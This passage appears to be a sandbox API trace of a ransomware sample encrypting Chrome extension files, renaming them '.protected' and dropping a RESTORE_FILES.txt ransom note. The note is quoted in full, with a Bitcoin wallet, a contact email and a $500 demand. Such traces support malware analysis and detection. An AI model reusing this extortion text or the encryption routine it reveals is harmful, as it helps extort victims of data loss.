(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.793] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.793] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.793] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.793] CloseHandle (hObject=0x164) returned 1 [0078.793] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.793] lstrcmpiW (lpString1="ru", lpString2="Windows") returned -1 [0078.793] lstrcmpiW (lpString1="ru", lpString2="Program Files") returned 1 [0078.793] lstrcmpiW (lpString1="ru", lpString2="Program Files (x86)") returned 1 [0078.793] lstrcmpiW (lpString1="ru", lpString2="$Recycle.bin") returned 1 [0078.793] lstrcmpiW (lpString1="ru", lpString2="System Volume Information") returned -1 [0078.793] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru") returned 141 [0078.793] lstrcmpW (lpString1="ru", lpString2=".") returned 1 [0078.793] lstrcmpW (lpString1="ru", lpString2="..") returned 1 [0078.793] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\*") returned 143 [0078.793] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.794] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.794] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.794] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.794] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.794] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.794] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\.") returned 143 [0078.794] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.794] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.794] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.794] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.794] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.794] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.794] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.794] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\..") returned 144 [0078.794] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.794] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.794] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.794] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.794] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.794] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.794] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.795] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.795] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json") returned 155 [0078.795] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.795] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.795] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.795] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json") returned 155 [0078.795] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json") returned 155 [0078.795] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json") returned 155 [0078.795] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.795] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0x110, lpOverlapped=0x0) returned 1 [0078.796] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.796] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0x110, lpOverlapped=0x0) returned 1 [0078.796] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.796] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.796] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.796] CloseHandle (hObject=0x168) returned 1 [0078.796] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.protected") returned 165 [0078.796] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\messages.json.protected")) returned 1 [0078.798] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.798] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.798] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\RESTORE_FILES.txt") returned 159 [0078.798] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ru\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.798] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.798] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.799] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.799] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.799] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.799] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.799] CloseHandle (hObject=0x164) returned 1 [0078.800] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.800] lstrcmpiW (lpString1="sk", lpString2="Windows") returned -1 [0078.800] lstrcmpiW (lpString1="sk", lpString2="Program Files") returned 1 [0078.800] lstrcmpiW (lpString1="sk", lpString2="Program Files (x86)") returned 1 [0078.800] lstrcmpiW (lpString1="sk", lpString2="$Recycle.bin") returned 1 [0078.800] lstrcmpiW (lpString1="sk", lpString2="System Volume Information") returned -1 [0078.800] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk") returned 141 [0078.800] lstrcmpW (lpString1="sk", lpString2=".") returned 1 [0078.800] lstrcmpW (lpString1="sk", lpString2="..") returned 1 [0078.800] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\*") returned 143 [0078.800] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.800] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.800] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.800] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.800] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.800] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.800] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\.") returned 143 [0078.800] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.801] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.801] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.801] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.801] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.801] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.801] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.801] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\..") returned 144 [0078.801] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.801] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.801] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.801] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.801] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.801] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.801] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.801] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.801] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json") returned 155 [0078.801] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.801] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.801] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.801] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.801] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json") returned 155 [0078.801] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.801] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json") returned 155 [0078.801] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.801] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json") returned 155 [0078.801] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.802] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe3, lpOverlapped=0x0) returned 1 [0078.802] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.802] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe3, lpOverlapped=0x0) returned 1 [0078.802] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.802] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.803] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.803] CloseHandle (hObject=0x168) returned 1 [0078.803] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.protected") returned 165 [0078.803] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\messages.json.protected")) returned 1 [0078.803] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.803] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.803] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\RESTORE_FILES.txt") returned 159 [0078.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.804] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.804] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.804] lstrlenA 